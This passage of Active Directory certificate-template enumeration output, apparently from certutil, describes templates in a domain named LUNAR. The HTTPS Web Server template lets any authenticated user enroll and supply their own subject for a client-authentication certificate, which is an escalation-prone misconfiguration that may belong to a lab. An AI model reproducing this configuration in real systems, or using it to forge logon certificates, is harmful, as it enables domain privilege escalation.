  908. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  909. Allow Enroll LUNAR\Domain Admins
  910. Allow Enroll LUNAR\Enterprise Admins
  911. Allow Full Control LUNAR\Domain Admins
  912. Allow Full Control LUNAR\Enterprise Admins
  913. Allow Read NT AUTHORITY\Authenticated Users
  914. TemplatePropExtensions =
  915. 3 Extensions:
  916. Extension[0]:
  917. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2c
  918. Certificate Template Name (Certificate Type)
  919. ExchangeUserSignature
  920. Extension[1]:
  921. 2.5.29.37: Flags = 0, Length = c
  922. Enhanced Key Usage
  923. Secure Email (1.3.6.1.5.5.7.3.4)
  924. Extension[2]:
  925. 2.5.29.15: Flags = 1(Critical), Length = 4
  926. Key Usage
  927. Digital Signature (80)
  928. TemplatePropValidityPeriod = 1 Years
  929. TemplatePropRenewalPeriod = 6 Weeks
  930. Template[16]:
  931. TemplatePropCommonName = ExchangeUser
  932. TemplatePropFriendlyName = Exchange User
  933. TemplatePropEKUs =
  934. 1 ObjectIds:
  935. 1.3.6.1.5.5.7.3.4 Secure Email
  936. TemplatePropCryptoProviders =
  937. 0: Microsoft Enhanced Cryptographic Provider v1.0
  938. 1: Microsoft Base Cryptographic Provider v1.0
  939. TemplatePropMajorRevision = 7
  940. TemplatePropDescription = User
  941. TemplatePropSchemaVersion = 1
  942. TemplatePropMinorRevision = 1
  943. TemplatePropRASignatureCount = 0
  944. TemplatePropMinimumKeySize = 800 (2048)
  945. TemplatePropOID =
  946. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.23
  947. TemplatePropEnrollmentFlags = 1
  948. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  949. TemplatePropSubjectNameFlags = 1
  950. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  951. TemplatePropPrivateKeyFlags = 10 (16)
  952. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  953. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  954. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  955. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  956. TemplatePropGeneralFlags = 10211 (66065)
  957. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  958. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  959. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  960. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  961. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  962. Allow Enroll LUNAR\Domain Admins
  963. Allow Enroll LUNAR\Enterprise Admins
  964. Allow Full Control LUNAR\Domain Admins
  965. Allow Full Control LUNAR\Enterprise Admins
  966. Allow Read NT AUTHORITY\Authenticated Users
  967. TemplatePropExtensions =
  968. 3 Extensions:
  969. Extension[0]:
  970. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1a
  971. Certificate Template Name (Certificate Type)
  972. ExchangeUser
  973. Extension[1]:
  974. 2.5.29.37: Flags = 0, Length = c
  975. Enhanced Key Usage
  976. Secure Email (1.3.6.1.5.5.7.3.4)
  977. Extension[2]:
  978. 2.5.29.15: Flags = 1(Critical), Length = 4
  979. Key Usage
  980. Key Encipherment (20)
  981. TemplatePropValidityPeriod = 1 Years
  982. TemplatePropRenewalPeriod = 6 Weeks
  983. Template[17]:
  984. TemplatePropCommonName = HTTPSWebServer
  985. TemplatePropFriendlyName = HTTPS Web Server
  986. TemplatePropEKUs =
  987. 1 ObjectIds:
  988. 1.3.6.1.5.5.7.3.2 Client Authentication
  989. TemplatePropCryptoProviders =
  990. 0: Microsoft RSA SChannel Cryptographic Provider
  991. 1: Microsoft DH SChannel Cryptographic Provider
  992. TemplatePropMajorRevision = 64 (100)
  993. TemplatePropDescription = Computer
  994. TemplatePropSchemaVersion = 2
  995. TemplatePropMinorRevision = d (13)
  996. TemplatePropRASignatureCount = 0
  997. TemplatePropMinimumKeySize = 800 (2048)
  998. TemplatePropOID =
  999. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.8824417.6496437 HTTPS Web Server
  1000. TemplatePropV1ApplicationPolicy =
  1001. 1 ObjectIds:
  1002. 1.3.6.1.5.5.7.3.2 Client Authentication
  1003. TemplatePropEnrollmentFlags = 8
  1004. CT_FLAG_PUBLISH_TO_DS -- 8
  1005. TemplatePropSubjectNameFlags = 1
  1006. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1007. TemplatePropPrivateKeyFlags = 5050010 (84213776)
  1008. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1009. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1010. TEMPLATE_SERVER_VER_WINBLUE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 50000 (327680)
  1011. TEMPLATE_CLIENT_VER_WINBLUE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 5000000 (83886080)
  1012. TemplatePropGeneralFlags = 20241 (131649)
  1013. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1014. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1015. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1016. CT_FLAG_IS_MODIFIED -- 20000 (131072)
  1017. TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;AU)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;LCRPLORC;;;AU)
  1018. Allow Enroll LUNAR\Domain Admins
  1019. Allow Enroll LUNAR\Enterprise Admins
  1020. Allow Enroll NT AUTHORITY\Authenticated Users
  1021. Allow Full Control LUNAR\Domain Admins
  1022. Allow Full Control LUNAR\Enterprise Admins
  1023. Allow Full Control LUNAR\Administrator
  1024. Allow Read NT AUTHORITY\Authenticated Users
  1025. TemplatePropExtensions =
  1026. 4 Extensions:
  1027. Extension[0]:
  1028. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 31
  1029. Certificate Template Information
  1030. Template=HTTPS Web Server(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.8824417.6496437)
  1031. Major Version Number=100
  1032. Minor Version Number=13
  1033. Extension[1]:
  1034. 2.5.29.37: Flags = 0, Length = c
  1035. Enhanced Key Usage
  1036. Client Authentication (1.3.6.1.5.5.7.3.2)
  1037. Extension[2]:
  1038. 2.5.29.15: Flags = 1(Critical), Length = 4
  1039. Key Usage
  1040. Digital Signature, Key Encipherment (a0)
  1041. Extension[3]:
  1042. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = e
  1043. Application Policies
  1044. [1]Application Certificate Policy:
  1045. Policy Identifier=Client Authentication
  1046. TemplatePropValidityPeriod = 2 Years
  1047. TemplatePropRenewalPeriod = 6 Weeks
  1048. Template[18]:
  1049. TemplatePropCommonName = IPSECIntermediateOnline
  1050. TemplatePropFriendlyName = IPSec
  1051. TemplatePropEKUs =
  1052. 1 ObjectIds:
  1053. 1.3.6.1.5.5.8.2.2 IP security IKE intermediate
  1054. TemplatePropCryptoProviders =
  1055. 0: Microsoft RSA SChannel Cryptographic Provider
  1056. TemplatePropMajorRevision = 8
  1057. TemplatePropDescription = Computer
  1058. TemplatePropSchemaVersion = 1
  1059. TemplatePropMinorRevision = 1
  1060. TemplatePropRASignatureCount = 0
  1061. TemplatePropMinimumKeySize = 800 (2048)
  1062. TemplatePropOID =
  1063. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.19
  1064. TemplatePropEnrollmentFlags = 20 (32)
  1065. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1066. TemplatePropSubjectNameFlags = 18000000 (402653184)
  1067. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  1068. CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)
  1069. TemplatePropPrivateKeyFlags = 0
  1070. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1071. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1072. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1073. TemplatePropGeneralFlags = 10260 (66144)
  1074. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1075. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1076. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1077. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1078. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1079. Allow Enroll LUNAR\Domain Admins
  1080. Allow Enroll LUNAR\Domain Computers
  1081. Allow Enroll LUNAR\Domain Controllers
  1082. Allow Enroll LUNAR\Enterprise Admins
  1083. Allow Full Control LUNAR\Domain Admins
  1084. Allow Full Control LUNAR\Enterprise Admins
  1085. Allow Read NT AUTHORITY\Authenticated Users
  1086. TemplatePropExtensions =
  1087. 3 Extensions:
  1088. Extension[0]:
  1089. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 30
  1090. Certificate Template Name (Certificate Type)
  1091. IPSECIntermediateOnline
  1092. Extension[1]:
  1093. 2.5.29.37: Flags = 0, Length = c
  1094. Enhanced Key Usage
  1095. IP security IKE intermediate (1.3.6.1.5.5.8.2.2)
  1096. Extension[2]:
  1097. 2.5.29.15: Flags = 1(Critical), Length = 4
  1098. Key Usage
  1099. Digital Signature, Key Encipherment (a0)
  1100. TemplatePropValidityPeriod = 2 Years
  1101. TemplatePropRenewalPeriod = 6 Weeks
  1102. Template[19]:
  1103. TemplatePropCommonName = IPSECIntermediateOffline
  1104. TemplatePropFriendlyName = IPSec (Offline request)
  1105. TemplatePropEKUs =
  1106. 1 ObjectIds:
  1107. 1.3.6.1.5.5.8.2.2 IP security IKE intermediate
  1108. TemplatePropCryptoProviders =
  1109. 0: Microsoft RSA SChannel Cryptographic Provider
  1110. TemplatePropMajorRevision = 7
  1111. TemplatePropDescription = Computer
  1112. TemplatePropSchemaVersion = 1
  1113. TemplatePropMinorRevision = 1
  1114. TemplatePropRASignatureCount = 0
  1115. TemplatePropMinimumKeySize = 800 (2048)
  1116. TemplatePropOID =
  1117. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.20
  1118. TemplatePropEnrollmentFlags = 0
  1119. TemplatePropSubjectNameFlags = 1
  1120. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1121. TemplatePropPrivateKeyFlags = 0
  1122. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1123. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1124. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1125. TemplatePropGeneralFlags = 10241 (66113)
  1126. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1127. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1128. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1129. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1130. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1131. Allow Enroll LUNAR\Domain Admins
  1132. Allow Enroll LUNAR\Enterprise Admins
  1133. Allow Full Control LUNAR\Domain Admins
  1134. Allow Full Control LUNAR\Enterprise Admins
  1135. Allow Read NT AUTHORITY\Authenticated Users
  1136. TemplatePropExtensions =
  1137. 3 Extensions:
  1138. Extension[0]:
  1139. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 32
  1140. Certificate Template Name (Certificate Type)
  1141. IPSECIntermediateOffline
  1142. Extension[1]:
  1143. 2.5.29.37: Flags = 0, Length = c
  1144. Enhanced Key Usage
  1145. IP security IKE intermediate (1.3.6.1.5.5.8.2.2)
  1146. Extension[2]:
  1147. 2.5.29.15: Flags = 1(Critical), Length = 4
  1148. Key Usage
  1149. Digital Signature, Key Encipherment (a0)
  1150. TemplatePropValidityPeriod = 2 Years
  1151. TemplatePropRenewalPeriod = 6 Weeks
  1152. Template[20]:
  1153. TemplatePropCommonName = KerberosAuthentication
  1154. TemplatePropFriendlyName = Kerberos Authentication
  1155. TemplatePropEKUs =
  1156. 4 ObjectIds:
  1157. 1.3.6.1.5.5.7.3.2 Client Authentication
  1158. 1.3.6.1.5.5.7.3.1 Server Authentication
  1159. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  1160. 1.3.6.1.5.2.3.5 KDC Authentication
  1161. TemplatePropCryptoProviders =
  1162. 0: Microsoft RSA SChannel Cryptographic Provider
  1163. TemplatePropMajorRevision = 6e (110)
  1164. TemplatePropDescription = Computer
  1165. TemplatePropSchemaVersion = 2
  1166. TemplatePropMinorRevision = 0
  1167. TemplatePropRASignatureCount = 0
  1168. TemplatePropMinimumKeySize = 800 (2048)
  1169. TemplatePropOID =
  1170. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.33 Kerberos Authentication
  1171. TemplatePropV1ApplicationPolicy =
  1172. 4 ObjectIds:
  1173. 1.3.6.1.5.5.7.3.2 Client Authentication
  1174. 1.3.6.1.5.5.7.3.1 Server Authentication
  1175. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  1176. 1.3.6.1.5.2.3.5 KDC Authentication
  1177. TemplatePropEnrollmentFlags = 20 (32)
  1178. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1179. TemplatePropSubjectNameFlags = 8400000 (138412032)
  1180. CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS -- 400000 (4194304)
  1181. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  1182. TemplatePropPrivateKeyFlags = 0
  1183. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1184. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1185. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1186. TemplatePropGeneralFlags = 10060 (65632)
  1187. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1188. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1189. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1190. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1191. Allow Enroll LUNAR\Enterprise Read-only Domain Controllers
  1192. Allow Auto-Enroll LUNAR\Enterprise Read-only Domain Controllers
  1193. Allow Enroll LUNAR\Domain Admins
  1194. Allow Enroll LUNAR\Domain Controllers
  1195. Allow Enroll LUNAR\Enterprise Admins
  1196. Allow Auto-Enroll LUNAR\Domain Controllers
  1197. Allow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  1198. Allow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  1199. Allow Full Control LUNAR\Domain Admins
  1200. Allow Full Control LUNAR\Enterprise Admins
  1201. Allow Read NT AUTHORITY\Authenticated Users
  1202. TemplatePropExtensions =
  1203. 4 Extensions:
  1204. Extension[0]:
  1205. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  1206. Certificate Template Information
  1207. Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.33)
  1208. Major Version Number=110
  1209. Minor Version Number=0
  1210. Extension[1]:
  1211. 2.5.29.37: Flags = 0, Length = 2b
  1212. Enhanced Key Usage
  1213. Client Authentication (1.3.6.1.5.5.7.3.2)
  1214. Server Authentication (1.3.6.1.5.5.7.3.1)
  1215. Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  1216. KDC Authentication (1.3.6.1.5.2.3.5)
  1217. Extension[2]:
  1218. 2.5.29.15: Flags = 1(Critical), Length = 4
  1219. Key Usage
  1220. Digital Signature, Key Encipherment (a0)
  1221. Extension[3]:
  1222. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = 33
  1223. Application Policies
  1224. [1]Application Certificate Policy:
  1225. Policy Identifier=Client Authentication
  1226. [2]Application Certificate Policy:
  1227. Policy Identifier=Server Authentication
  1228. [3]Application Certificate Policy:
  1229. Policy Identifier=Smart Card Logon
  1230. [4]Application Certificate Policy:
  1231. Policy Identifier=KDC Authentication
  1232. TemplatePropValidityPeriod = 1 Years
  1233. TemplatePropRenewalPeriod = 6 Weeks
  1234. Template[21]:
  1235. TemplatePropCommonName = KeyRecoveryAgent
  1236. TemplatePropFriendlyName = Key Recovery Agent
  1237. TemplatePropEKUs =
  1238. 1 ObjectIds:
  1239. 1.3.6.1.4.1.311.21.6 Key Recovery Agent
  1240. TemplatePropCryptoProviders =
  1241. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1242. TemplatePropMajorRevision = 69 (105)
  1243. TemplatePropDescription = Key recovery agent
  1244. TemplatePropSchemaVersion = 2
  1245. TemplatePropMinorRevision = 0
  1246. TemplatePropRASignatureCount = 0
  1247. TemplatePropMinimumKeySize = 800 (2048)
  1248. TemplatePropOID =
  1249. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.27 Key Recovery Agent
  1250. TemplatePropV1ApplicationPolicy =
  1251. 1 ObjectIds:
  1252. 1.3.6.1.4.1.311.21.6 Key Recovery Agent
  1253. TemplatePropEnrollmentFlags = 27 (39)
  1254. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  1255. CT_FLAG_PEND_ALL_REQUESTS -- 2
  1256. CT_FLAG_PUBLISH_TO_KRA_CONTAINER -- 4
  1257. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1258. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  1259. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1260. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1261. TemplatePropPrivateKeyFlags = 10 (16)
  1262. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1263. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1264. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1265. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1266. TemplatePropGeneralFlags = 10020 (65568)
  1267. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1268. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1269. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1270. Allow Enroll LUNAR\Domain Admins
  1271. Allow Enroll LUNAR\Enterprise Admins
  1272. Allow Full Control LUNAR\Domain Admins
  1273. Allow Full Control LUNAR\Enterprise Admins
  1274. Allow Read NT AUTHORITY\Authenticated Users
  1275. TemplatePropExtensions =
  1276. 4 Extensions:
  1277. Extension[0]:
  1278. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  1279. Certificate Template Information
  1280. Template=Key Recovery Agent(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.27)
  1281. Major Version Number=105
  1282. Minor Version Number=0
  1283. Extension[1]:
  1284. 2.5.29.37: Flags = 0, Length = d
  1285. Enhanced Key Usage
  1286. Key Recovery Agent (1.3.6.1.4.1.311.21.6)
  1287. Extension[2]:
  1288. 2.5.29.15: Flags = 1(Critical), Length = 4
  1289. Key Usage
  1290. Key Encipherment (20)
  1291. Extension[3]:
  1292. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = f
  1293. Application Policies
  1294. [1]Application Certificate Policy:
  1295. Policy Identifier=Key Recovery Agent
  1296. TemplatePropValidityPeriod = 2 Years
  1297. TemplatePropRenewalPeriod = 6 Weeks
  1298. Template[22]:
  1299. TemplatePropCommonName = OCSPResponseSigning
  1300. TemplatePropFriendlyName = OCSP Response Signing
  1301. TemplatePropEKUs =
  1302. 1 ObjectIds:
  1303. 1.3.6.1.5.5.7.3.9 OCSP Signing
  1304. TemplatePropMajorRevision = 65 (101)
  1305. TemplatePropDescription = Computer
  1306. TemplatePropSchemaVersion = 3
  1307. TemplatePropMinorRevision = 0
  1308. TemplatePropRASignatureCount = 0
  1309. TemplatePropMinimumKeySize = 800 (2048)
  1310. TemplatePropOID =
  1311. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.32 OCSP Response Signing
  1312. TemplatePropV1ApplicationPolicy =
  1313. 1 ObjectIds:
  1314. 1.3.6.1.5.5.7.3.9 OCSP Signing
  1315. TemplatePropAsymmetricAlgorithm = RSA
  1316. TemplatePropKeySecurityDescriptor = D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;GR;;;S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419)
  1317. Allow Write BUILTIN\Administrators
  1318. Allow Write NT AUTHORITY\SYSTEM
  1319. Allow Read S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419
  1320. TemplatePropHashAlgorithm = SHA1
  1321. TemplatePropKeyUsage = 2
  1322. TemplatePropEnrollmentFlags = 5000 (20480)
  1323. CT_FLAG_ADD_OCSP_NOCHECK -- 1000 (4096)
  1324. CT_FLAG_NOREVOCATIONINFOINISSUEDCERTS -- 4000 (16384)
  1325. TemplatePropSubjectNameFlags = 18000000 (402653184)
  1326. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  1327. CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)
  1328. TemplatePropPrivateKeyFlags = 0
  1329. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1330. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1331. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1332. TemplatePropGeneralFlags = 10240 (66112)
  1333. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1334. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1335. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1336. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1337. Allow Enroll LUNAR\Domain Admins
  1338. Allow Enroll LUNAR\Enterprise Admins
  1339. Allow Full Control LUNAR\Domain Admins
  1340. Allow Full Control LUNAR\Enterprise Admins
  1341. Allow Read NT AUTHORITY\Authenticated Users
  1342. TemplatePropExtensions =
  1343. 5 Extensions:
  1344. Extension[0]:
  1345. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  1346. Certificate Template Information
  1347. Template=OCSP Response Signing(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.32)
  1348. Major Version Number=101
  1349. Minor Version Number=0
  1350. Extension[1]:
  1351. 2.5.29.37: Flags = 0, Length = c
  1352. Enhanced Key Usage
  1353. OCSP Signing (1.3.6.1.5.5.7.3.9)
  1354. Extension[2]:
  1355. 2.5.29.15: Flags = 1(Critical), Length = 4
  1356. Key Usage
  1357. Digital Signature (80)
  1358. Extension[3]:
  1359. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = e
  1360. Application Policies
  1361. [1]Application Certificate Policy:
  1362. Policy Identifier=OCSP Signing
  1363. Extension[4]:
  1364. 1.3.6.1.5.5.7.48.1.5: Flags = 0, Length = 2
  1365. OCSP No Revocation Checking
  1366. 0000 05 00 ..
  1367. 0000: 05 00 ; NULL (0 Bytes)
  1368. TemplatePropValidityPeriod = 2 Weeks
  1369. TemplatePropRenewalPeriod = 2 Days
  1370. Template[23]:
  1371. TemplatePropCommonName = RASAndIASServer
  1372. TemplatePropFriendlyName = RAS and IAS Server
  1373. TemplatePropEKUs =
  1374. 2 ObjectIds:
  1375. 1.3.6.1.5.5.7.3.2 Client Authentication
  1376. 1.3.6.1.5.5.7.3.1 Server Authentication
  1377. TemplatePropCryptoProviders =
  1378. 0: Microsoft RSA SChannel Cryptographic Provider
  1379. TemplatePropMajorRevision = 65 (101)
  1380. TemplatePropDescription = Computer
  1381. TemplatePropSchemaVersion = 2
  1382. TemplatePropMinorRevision = 0
  1383. TemplatePropRASignatureCount = 0
  1384. TemplatePropMinimumKeySize = 800 (2048)
  1385. TemplatePropOID =
  1386. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.31 RAS and IAS Server
  1387. TemplatePropV1ApplicationPolicy =
  1388. 2 ObjectIds:
  1389. 1.3.6.1.5.5.7.3.2 Client Authentication
